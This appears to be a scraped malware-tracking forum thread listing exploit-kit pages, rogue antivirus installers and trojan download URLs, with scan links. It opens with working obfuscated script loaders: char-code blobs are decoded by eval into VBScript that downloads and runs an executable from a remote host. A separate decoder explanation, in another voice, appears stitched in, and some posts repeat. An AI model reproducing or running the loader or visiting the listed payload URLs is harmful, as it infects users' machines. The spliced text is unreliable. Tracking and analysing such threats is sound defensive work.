16.101.67.111.100.101.37.51.68.65.115.99.66.37.50.56.99.66.121.116.101.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.80.108.117.103.105.110.70.105.108.101.46.87.114.105.116.101.37.50.56.67.104.114.37.50.56.66.121.116.101.67.111.100.101.37.50.57.37.50.57.37.48.68.37.48.65.78.101.120.116.37.48.68.37.48.65.37.50.48.37.50.48.80.108.117.103.105.110.70.105.108.101.46.67.108.111.115.101.37.48.68.37.48.65.37.50.48.37.50.48.83.101.116.37.50.48.111.87.83.104.101.108.108.37.51.68.119.105.110.100.111.119.46.111.82.68.83.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.37.50.50.87.83.99.114.105.37.50.50.37.50.48.37.50.54.37.50.48.37.50.50.112.116.46.83.104.101.108.108.37.50.50.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.79.110.37.50.48.69.114.114.111.114.37.50.48.82.101.115.117.109.101.37.50.48.78.101.120.116.37.48.68.37.48.65.37.50.48.37.50.48.111.87.83.104.101.108.108.46.82.117.110.37.50.48.37.50.56.119.105.110.100.111.119
.46.101.120.101.78.97.109.101.37.50.57.37.50.67.49.37.50.67.70.65.76.83.69.37.48.68.37.48.65.69.108.115.101.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.77.111.100.101.37.51.68.97.100.77.111.100.101.82.101.97.100.87.114.105.116.101.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.84.121.112.101.37.51.68.97.100.84.121.112.101.66.105.110.97.114.121.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.79.112.101.110.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.87.114.105.116.101.37.50.48.119.105.110.100.111.119.46.88.77.76.66.111.100.121.37.48.68.37.48.65.37.50.48.111.83.116.114.101.97.109.46.83.97.118.101.84.111.70.105.108.101.37.48.68.37.48.65.37.48.68.37.48.65.119.105.110.100.111.119.46.101.120.101.78.97.109.101.37.50.67.97.100.83.97.118.101.67.114.101.97.116.101.79.118.101.114.87.114.105.116.101.37.48.68.37.48.65.37.50.48.119.105.110.100.111.119.46.111.83.104.101.108.108.65.112.112.46.83.104.101.108.108.69.120.101.99.117.116.101.37.50.48.119.105.110.100.111.119.46.101.120.101.78.97.109.101.37.48.68.37.48.65.69.110.100.37.50.48.73.102.37.48.68.37.48.65.37.51.67.37.50.70.115.99.114.105.112.116.37.51.69.37.48.68.37.48.65.37.51.67.115.99.114.105.112.116.37.50.48.108.97.110.103.117.97.103.101.37.51.68.37.50.50.86.66.83.99.114.105.112.116.37.50.50.37.51.69.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.111.110.37.50.48.101.114.114.111.114.37.50.48.114.101.115.117.109.101.37.50.48.110.101.120.116.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.100.108.37.50.48.37.51.68.37.50.48.37.50.50.104.116.116.112.37.51.65.37.50.70.37.50.70.50.51.51.50.52.50.46.99.111.109.37.50.70.49.37.50.70.108.111.97.100.46.112.104.112.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.83.101.116.37.50.48.100.102.37.50.48.37.51.68.37.50.48.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.37.50.56.37.50.50.111.98.106.101.99.116.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.3
7.50.48.99.108.115.49.37.51.68.37.50.50.99.108.115.105.100.37.51.65.66.68.57.54.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.50.37.51.68.37.50.50.67.53.53.54.45.54.53.65.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.51.37.51.68.37.50.50.51.45.49.49.68.48.45.57.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.52.37.51.68.37.50.50.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.54.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.37.50.48.99.108.115.102.117.108.108.37.51.68.99.108.115.49.37.50.54.99.108.115.50.37.50.54.99.108.115.51.37.50.54.99.108.115.52.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.100.102.46.115.101.116.65.116.116.114.105.98.117.116.101.37.50.48.37.50.50.99.108.97.115.115.105.100.37.50.50.37.50.67.99.108.115.102.117.108.108.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.49.37.51.68.37.50.50.77.105.99.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.50.37.51.68.37.50.50.114.111.115.111.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.51.37.51.68.37.50.50.102.116.46.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.52.37.51.68.37.50.50.88.77.76.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.53.37.51.68.37.50.50.72.84.84.80.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.37.51.68.115.116.114.49.37.50.54.115.116.114.50.37.50.54.115.116.114.51.37.50.54.115.116.114.52.37.50.54.115.116.114.53.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.83.101.116.37.50.48.120.37.50.48.37.51.68.37.50.48.100.102.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.115.116.114.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.49.37.51.68.37.50.50.65.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.
50.48.97.119.98.50.37.51.68.37.50.50.100.111.100.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.51.37.51.68.37.50.50.98.46.83.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.52.37.51.68.37.50.50.116.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.53.37.51.68.37.50.50.114.101.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.97.119.98.54.37.51.68.37.50.50.97.109.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.98.49.37.51.68.97.119.98.49.37.50.54.97.119.98.50.37.50.54.97.119.98.51.37.50.54.97.119.98.52.37.50.54.97.119.98.53.37.50.54.97.119.98.54.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.98.53.37.51.68.115.116.114.98.49.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.101.116.37.50.48.89.89.37.50.48.37.51.68.37.50.48.100.102.46.99.114.101.97.116.101.111.98.106.101.99.116.37.50.56.115.116.114.98.53.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.89.89.46.116.121.112.101.37.50.48.37.51.68.37.50.48.49.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.116.114.54.37.51.68.37.50.50.71.69.84.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.120.46.79.112.101.110.37.50.48.115.116.114.54.37.50.67.37.50.48.100.108.37.50.67.37.50.48.70.97.108.115.101.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.120.46.83.101.110.100.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.102.110.97.109.101.122.122.49.37.51.68.37.50.50.102.105.108.101.46.101.120.101.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.49.37.51.68.37.50.50.83.99.114.105.112.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.50.37.51.68.37.50.50.116.105.110.103.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.51.37.51.68.37.50.50.46.70.105.108.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.
99.114.105.112.52.37.51.68.37.50.50.101.83.121.115.116.101.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.53.37.51.68.37.50.50.109.79.98.106.101.99.116.37.50.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.99.114.105.112.37.51.68.115.99.114.105.112.49.37.50.54.115.99.114.105.112.50.37.50.54.115.99.114.105.112.51.37.50.54.115.99.114.105.112.52.37.50.54.115.99.114.105.112.53.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.101.116.37.50.48.70.70.37.50.48.37.51.68.37.50.48.100.102.46.99.114.101.97.116.101.111.98.106.101.99.116.37.50.56.115.99.114.105.112.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.101.116.37.50.48.116.109.112.37.50.48.37.51.68.37.50.48.70.46.71.101.116.83.112.101.99.105.97.108.70.111.108.100.101.114.37.50.56.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.102.110.97.109.101.122.122.49.37.51.68.37.50.48.70.70.46.66.117.105.108.100.80.97.116.104.37.50.56.116.109.112.37.50.67.102.110.97.109.101.122.122.49.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.89.89.46.111.112.101.110.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.89.89.46.119.114.105.116.101.37.50.48.120.46.114.101.115.112.111.110.115.101.66.111.100.121.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.89.89.46.115.97.118.101.116.111.102.105.108.101.37.50.48.102.110.97.109.101.122.122.49.37.50.67.50.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.89.89.46.99.108.111.115.101.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.115.101.116.37.50.48.77.77.37.50.48.37.51.68.37.50.48.100.102.46.99.114.101.97.116.101.111.98.106.101.99.116.37.50.56.37.50.50.83.104.101.108.108.46.65.112.112.108.105.99.97.116.105.111.110.37.50.50.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.37.50.48.37.50.48.77.77.46.83.104.101.108.108.69.120.101.99.117.116.101.37.50.48.102.110.97.109.101.122.122.49.37.50.67.37.50.50.37.50.50.37.50.67.37.5
0.50.37.50.50.37.50.67.37.50.50.111.112.101.110.37.50.50.37.50.67.48.37.48.68.37.48.65.37.51.67.37.50.70.115.99.114.105.112.116.37.51.69.34.41.41.59</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|*]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("QIgskwBJjInK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script></script>
<style>.M7RtpCTPdGVn6K_41K{display:none;}</style>
<b class="M7RtpCTPdGVn6K_41K" id="K_41K1">^e!^^^v^!^a^l!^</b>
<script>window.onerror = return(true);</script>
<div class="M7RtpCTPdGVn6K_41K" id="M7RtpCTPdGVn6K_41K">13.10.100.111.99.117.109.101.110.116.46.119.114.105.116.101.40.34.60.111.98.106.101.99.116.32.105.100.61.92.34.75.95.52.49.75.67.56.122.92.34.32.99.108.97.115.115.105.100.61.92.34.99.108.115.105.100.58.123.57.55.65.70.52.65.52.53.45.52.57.66.69.45.52.52.56.53.45.57.70.53.53.45.57.49.65.66.52.48.70.50.56.56.70.50.125.92.34.62.60.47.111.98.106.101.99.116.62.34.41.59.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.65.56.122.40.41.13.10.32.123.13.10.32.118.97.114.32.75.95.52.49.75.66.56.122.32.61.32.34.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.34.13.10.32.75.95.52.49.75.67.56.122.46.79.112.101.110.87.101.98.70.105.108.101.40.75.95.52.49.75.66.56.122.41.13.10.32.125.13.10.32.75.95.52.49.75.65.56.122.40.41.59.13.10.32</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|^]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("M7RtpCTPdGVn6K_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script>
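The loader in the dump above reads a hidden element whose text is a dotted list of decimal character codes, rewrites every letter with the bitwise expression in the `replace` callback, splits on `.`, rebuilds the string with `String.fromCharCode`, and hands the result to `eval` (recovered from a junk-padded `^e!^^^v^!^a^l!^` by deleting the padding characters). The block below is an added example, not code from the post: a stand-alone decoder that performs the same steps but returns the recovered text instead of executing it. The sample payload, the `second-stage.invalid` host and the function names are constructed for the demonstration.

```javascript
// Added example (not code from the post): a stand-alone decoder for the
// dotted-charcode loader shown above. The loader's own steps are:
//   1. read a hidden element's innerHTML: decimal char codes joined by "."
//   2. rewrite every ASCII letter with ((c & 223) - 52) % 26 + (c & 32) + 65,
//      which is ROT13 (a no-op on a digit-only payload, kept here to match it)
//   3. split on "." and map each token through String.fromCharCode
//   4. pass the text to eval, recovered from a junk-padded string such as
//      "^e!^^^v^!^a^l!^" by deleting the junk characters
// This version performs steps 2-4 but returns the text instead of executing it.

// Step 2: the loader's letter transform, bit for bit.
function rot13Letter(ch) {
  const c = ch.charCodeAt(0);
  return String.fromCharCode((((c & 223) - 52) % 26) + (c & 32) + 65);
}

// Step 4: strip the padding characters the loader removes with a regex class.
function stripJunk(padded, junk) {
  const cls = junk.replace(/[\\\]^-]/g, "\\$&"); // escape class metacharacters
  return padded.replace(new RegExp("[" + cls + "]", "g"), "");
}

// Steps 2 and 3: turn "13.10.100.111..." back into text. Throws on tokens that
// are not char codes, so a truncated or doubly-encoded blob is reported rather
// than silently turned into NUL characters (String.fromCharCode(NaN) === "\0").
function decodeDottedPayload(encoded) {
  const normalised = encoded.replace(/[A-Za-z]/g, rot13Letter);
  return normalised
    .split(".")
    .filter((tok) => tok.length > 0) // tolerate a trailing "."
    .map((tok) => {
      const n = Number(tok);
      if (!Number.isInteger(n) || n < 0 || n > 0xffff) {
        throw new Error("not a char code: " + JSON.stringify(tok));
      }
      return String.fromCharCode(n);
    })
    .join("");
}

// Inverse of the loader's encoding; used only to build the labelled sample below.
function encodeDottedPayload(text) {
  return Array.from(text, (ch) => String(ch.charCodeAt(0))).join(".");
}

// Pull out anything that looks like a URL from the recovered script, so the
// second-stage location can be blocked without ever running the first stage.
function extractUrls(decoded) {
  return decoded.match(/https?:\/\/[^\s"'<>)]+/g) || [];
}

// Constructed sample standing in for the hidden <div>'s contents: an object tag
// plus a method call that fetches a second stage. The element id, method name
// and host are placeholders, not values taken from the thread.
const SAMPLE_PLAIN =
  'document.write("<object id=\\"x\\"></object>");\r\n' +
  'x.Fetch("http://second-stage.invalid/load.php");';
const SAMPLE_ENCODED = encodeDottedPayload(SAMPLE_PLAIN);

// What the loader would have handed to eval, and the URL inside it.
function decodeSample() {
  const callName = stripJunk("^e!^^^v^!^a^l!^", "!^"); // the loader's "eval"
  const script = decodeDottedPayload(SAMPLE_ENCODED);
  return { callName, script, urls: extractUrls(script) };
}
```

Running `decodeSample()` yields the call name `eval`, the original script text and the single second-stage URL. The point of throwing on a bad token rather than following the loader's behaviour is that a damaged capture then fails loudly instead of producing a string of NULs that looks decoded but is not.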
-
I believe reports to
newsineurope.net/z/config.bin
newsineurope.net/z/s.php?1=smoked_000de8e6&i=test
newsineurope.net/z/s.php?2=smoked_000de8e6&n=0&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?2=smoked_000de8e6&n=1&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?3=smoked_000de8e6&id=1238936099
http://wepawet.cs.ucsb.edu/view.php?hash=7e2b3bcf078f597a13b9d4f3cf60283c&t=1238957989&type=js
has changed to mabira.net/z/config.bin at the same host.
newsineurope.net/z/config.bin is not available.
-
javacsript.biz/in/in.cgi?2
http://wepawet.cs.ucsb.edu/view.php?hash=a85e578048b1a2f6bd32246b5c9ef7b9&t=1238961548&type=js
redirects to exploits at
http://netcorbina.org/in90/
netcorbina.org/in90/iepdf.php?f=new
http://www.virustotal.com/analisis/e0798c9484695e356ca872fb150410ca 1/40
trojan
http://netcorbina.org/in90/load.php
http://www.virustotal.com/analisis/f1051127ffaba83b33e3761c455a46c5 2/40
-
rogue:
http://tubeloyaln.com/scan/?id=260
http://winpc-antivirus.com/
exploit/trojan:
http://sykalab.net/inn/index.php
http://wepawet.iseclab.org/view.php?hash=c8b425b1ef9fb404ee337d4e72d467b6&t=1238959411&type=js
-
These two are quite well detected...
hxxp://put.ghura.pl/81.exe
hxxp://put.ghura.pl/wr.exe
This one isn't very well detected...
hxxp://nemesis.feed.parkingspa.com/NemesisClient.cab
http://www.virustotal.com/analisis/d8f47e014b7190ba7ec12112ea7c5ba8
And the well-known friends from zief.pl once again...
hxxp://zief.pl/iraq.jpg/
http://www.virustotal.com/analisis/7e573eac2d13fbc94bf9d81d2702c140
--->
hxxp://jl.chura.pl/rc/pdf.php?id=456346
http://wepawet.iseclab.org/view.php?hash=c5ec3e0138dd5d5b4d9c204654deb18a&t=1239017754&type=js
Zief.pl crap in attachment as well, password is "infected" as always...
-
exploit
http://www.poshlivse.com/index.php
http://wepawet.iseclab.org/view.php?hash=92dff88b48386b1b933001ca33b73212&t=1239014786&type=js
trojan
http://www.poshlivse.com/load.php
MD5...: 38970d48df49ca67e06a755350ca9029
http://www.virustotal.com/analisis/ef07a0f7e3e2b1413a9fd591ceede630 2/40
eSafe 7.0.17.0 2009.04.05 Suspicious File
Sophos 4.40.0 2009.04.06 Mal/EncPk-HJ
A compromised site which contains an Iframe to this site is
limitin.de
http://wepawet.iseclab.org/view.php?hash=cd2389a3c5064493afe100c17c953d11&t=1239015252&type=js
trojan Koobface
79.119.2.227/pid=1000/setup.exe
98.200.26.126/pid=1000/setup.exe
-
Another Koobface...
hxxp://96.35.12.230
hxxp://96.35.12.230/player.swf?pid=6123
hxxp://96.35.12.230/setup.exe
What's kinda interesting actually is the .swf itself...
http://www.virustotal.com/analisis/428b28603b7ef35dfa4b35d85ae65fcc
And after being decompressed also...
http://wepawet.iseclab.org/view.php?hash=c17f6d015c0bc212850fc20e9133e700&type=swf
http://www.virustotal.com/analisis/388afb42ca35d977a980b631b6f7419b
Can't really say it's not to be considered at least as a malware component... :-\
hxxp://61.235.117.70/update.exe
http://www.virustotal.com/analisis/b6d794becce8fad6b6a20a581998dbe1
"It works!" -> is that so? :D
hxxp://usacaaugb.cn/life/iepdf.php?f=new
hxxp://usacaaugb.cn/life/iepdf.php?f=old
hxxp://usacaaugb.cn/life/load.php
hxxp://www.ohtas.biz/stproj/flash.php
Result: 11/40 (27.5%)
http://www.virustotal.com/analisis/809a0e88b7935b661a46fab342169c8a
hxxp://www.vivne.cn/vn.exe
http://www.virustotal.com/analisis/e3ae284eb9482b92f5cd7f09781c451a
http://anubis.iseclab.org/?action=result&task_id=1f8ac8cc0933668946de525e26eae0872&format=html
-
pdf exploit/trojan
famajormusic.ru/jjkj/in.php
http://wepawet.cs.ucsb.edu/view.php?hash=5bb19ee926f1557416d2ee2131adf36e&t=1239040477&type=js
http://www.virustotal.com/analisis/c6087121de76e697622bb78ded6e8e8d 6/40
-
Rogue:
Soldiersoftware.net
Redirect to exploit:
fikalo.de
http://wepawet.iseclab.org/view.php?hash=a3d3398c25bdc7262e98bd19cdee44c1&t=1239025317&type=js
-
Fake scanners:
http://sys-scan-wiz.org/download.php?page=http://sys-scan-wiz.org/
scanner-wiz-1.com
Avs-online-scan.org
av-lookup.org
Free-web-scaners.net/disk/?code=286
http://am-scan.com/l3/index.html?ref_id=7091
http://am-scan.com/download.php?page=http://am-scan.com/l3/index.html?ref_id=7091
Rogue installers:
http://222.186.9.187/setup.exe
http://www.spy-protector-pro.com/install.exe
http://chorussoft.biz/install.exe
http://webwidesecurity.com/index.php?affid=09400
http://webwidesecurity.com/download.php?affid=00000
fastpayprocess.com -> Pandora Software
Fake codecs:
xviewworldmy2.com/view/1/1220/3
-
exploits/Zbot
jeans0nline.cn/win/index.php?iuBgwPa
http://wepawet.iseclab.org/view.php?hash=2c245804906db1beb7aa12d7d6c18abd&t=1239091219&type=js
http://www.virustotal.com/analisis/fbc3fe9d822e4e95f6118663a438d051 5/40
It is a new Zbot variant which uses new file names.
http://www.threatexpert.com/report.aspx?md5=557c2e0a44e5fa46668383209dc7d65a
-
Few more
http://antiviral-scan-pro.com/11041/3/
http://files.load-pro-antispy.com/normal/setup_11041_3_1.exe
http://goforuniq.com/in.cgi?13&gai=csptop&gli=400&gff=cs_3578123074&al=
http://bonuspromooffer.com/vsm/adv/142/?a=csptop-sst&l=400&f=cs_3578123074&ex=&ed=&h=&sub=csp&prodabbr=3P_UVSM
http://dwnld.bonuspromooffer.com/secure/4f6c9cf2c210fefe73170ddfe8880e38/49db0f09/vsm/vsm_free_setup.exe
http://dwnld.promotion-offer.com/secure/2b686c9bbf54a2803cc230f1a3e6eb1d/49db1161/srm/srm_free_setup.exe
http://www.xp-shield.cn/download.html
-
couple more links
best-av1.info
http://download.best-av1.info/en/PE/install.exe
Other files usually used by this rogue family [browser hijacker, Fake BSOD..]
http://download.best-av1.info/en/PE/N1.CAB
http://download.best-av1.info/en/PE/QWProtect.dll
http://download.best-av1.info/en/PE/svchost.exe
-
pdf/flash exploit
truff.biz/myy/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=485a23bf02f4721e4170bffe1dfc0903&t=1239118663&type=js
trojan
http://truff.biz/myy/load.php?id=4
http://www.virustotal.com/analisis/78ca3e1b17cf6b3499d9714cf2cdda15
-
seems like Zeus in the end:
http://update3.cn/spl111/index.php
http://wepawet.iseclab.org/view.php?hash=13b9fbbd568f6bbba6bfb2088e20610d&t=1239121445&type=js
-
pdf exploit leading to zeus infection:
http://233242.info/1/include/spl.php
http://233242.info/1/load.php
http://www.virustotal.com/analisis/d6fcdb78ed428bf52f47e6fb75bed6fc
http://wepawet.iseclab.org/view.php?hash=b03cbc6d02dc98d6b9527060c8a7ebe9&t=1239125074&type=js
now this exploit isn't working well for me (if anyone else could check it, would be nice)
should start here but gave me some kind of error:
http://sh-hostz9.net/1/index.php
http://wepawet.iseclab.org/view.php?hash=20c7f173f3a113538dea1ba392d13305&t=1239121977&type=js
Iframes to :
http://sh-hostz9.net/1/pdf.php
http://wepawet.iseclab.org/view.php?hash=3c236eaec1299ed3c633aed33ae1736e&t=1239122033&type=js
and
http://sh-hostz9.net/1/vparivatel.php
(from here it gives you a screen to do some update)
http://wepawet.iseclab.org/view.php?hash=9a310342e3d2202d661d75be9333b869&t=1239131443&type=js
finally leads to the trojan:
http://sh-hostz9.net/1/load.php
Hmm, now it's starting from:
http://sh-hostz9.net/2/index.php
http://wepawet.iseclab.org/view.php?hash=f883649411359a991e9f55e2cc541cc8&t=1239132145&type=js
leading also to:
http://sh-hostz9.net/2/pdf.php
lol changed after 30 min or so ~.~
-
now this exploit isn't working well for me (if anyone else could check it, would be nice)
Both of them are on the same IP address, 220.196.59.26, meaning there's a good chance that if you first visited one of them...
And the rest of the domains hosted there aren't much different, heh... but I didn't manually verify them, merely googled them.
Earlier IPs in the same netblock host malicious domains from what I see...
Will attempt digging into them tomorrow though, need some sleep now ;-)
hxxp://goshak.biz/my/index.php
-
changed my IP between tries
anyway it's not that it recognizes my IP or something, it just gives some error saying "file does not begin with %pdf" or something like that
also another one on that IP:
http://volimir.biz/my/index.php
http://wepawet.iseclab.org/view.php?hash=57cae50b99f2591b0612eba32de4a67b&t=1239134249&type=js
the pdf exploit itself is at (wepawet didn't analyze it):
http://volimir.biz/my/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=22ae140b9b2f549caffb7328bb4dbf0c&t=1239134421&type=js
-
Oh, the .pdf file itself you meant? I'll check it tomorrow, my mind isn't working properly at the moment, plus I'm not in front of a VM... I need to sleep.
Last one for tonight - exploring the rest of this IP is... "left as an exercise for the reader" :D
http://www.bfk.de/bfk_dnslogger.html?query=220.196.59.17#result
hxxp://xdwlnbqsdsph5pc8rz81.cn/s_t.php
-
Forget where these dingleberries fell from... ???
174.133.72.250/p0324/2.0/td.bin?bb021908657356
174.133.73.178/p0324/2.0/d.bin?bb021908154292
75.125.239.42/p0324/2.0/so.bin?bb021908350659
dglcxlcfmk.net/bbsuper0.php
dglcxlcfmk.net/bbsuper1.php
dglcxlcfmk.net/bbsuper2.php
dglcxlcfmk.net/bbsuper3.php
dglcxlcfmk.net/uniq.php?id=1693466186&p=0
zief.pl/wr.exe
install.8800.org/files/5.exe
install.8800.org/files/adx.exe
install.8800.org/files/ipk.exe
install.8800.org/files/zha.exe
stanishev.com/1/nfr.exe
stanishev.com/1/pp.06.exe
xz.wanggui.com/mem322.exe
-
Oh, the .pdf file itself you meant? I'll check it tomorrow, my mind isn't working properly at the moment, plus I'm not in front of a VM... I need to sleep.
Last one for tonight - exploring the rest of this IP is... "left as an exercise for the reader" :D
http://www.bfk.de/bfk_dnslogger.html?query=220.196.59.17#result
hxxp://xdwlnbqsdsph5pc8rz81.cn/s_t.php
Nifty!
Sets up an FTP and AT jobs to run every 15 minutes, et al.
http://wepawet.iseclab.org/view.php?hash=19d22d89420a09c6d59b1d032f19de94&t=1239135714&type=js
ftp> open 122.224.9.221
Connected to 122.224.9.221.
220 www.host.com FTP server (Version 6.00LS) ready.
500 AUTH GSSAPI: command not understood.
500 AUTH KERBEROS_V4: command not understood.
KERBEROS_V4 rejected as an authentication type
Name (122.224.9.221:sandbox): qqq
331 Password required for qqq.
Password:
230 User qqq logged in, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get calc.exe
local: calc.exe remote: calc.exe
227 Entering Passive Mode (122,224,9,221,202,67)
150 Opening BINARY mode data connection for 'calc.exe' (245248 bytes).
226 Transfer complete.
245248 bytes received in 2.7 seconds (89 Kbytes/s)
ftp> quit
221 Goodbye.
$ mv calc.exe oddyoy.exe
http://www.malwaredomainlist.com/mdl.php?search=122.224.9&colsearch=All&quantity=50
http://www.virustotal.com/analisis/b80457dd723351fa2a2ff176bcfe8e8b
http://anubis.iseclab.org/?action=result&task_id=141ccbbd213e2be145dd0d57fc0a2d48e
http://13-2005-search.com/new1.php
<A HREF=http://xxxhardpornteenxxx.com
><BR><BR><BR><BR><BR><BR><BR><BR><BR><CENTER><FONT SIZE=+6>ENTER</FONT></A>
$ dig 13-2005-search.com +short
220.196.59.1
Busy little network
http://www.malwaredomainlist.com/mdl.php?search=220.196.59&colsearch=All&quantity=50
-
Regarding the PDF at hxxp://sh-hostz9.net/1/index.php, they must have something wrong in their scripts:
?>?>?><b>FPDF error:</b> Some data has already been output, can't send PDF file
-
The rest from the same IP mentioned yesterday... pretty easy task:
hxxp://dihbgbwqryuolfbebgme.cn/s_t.php
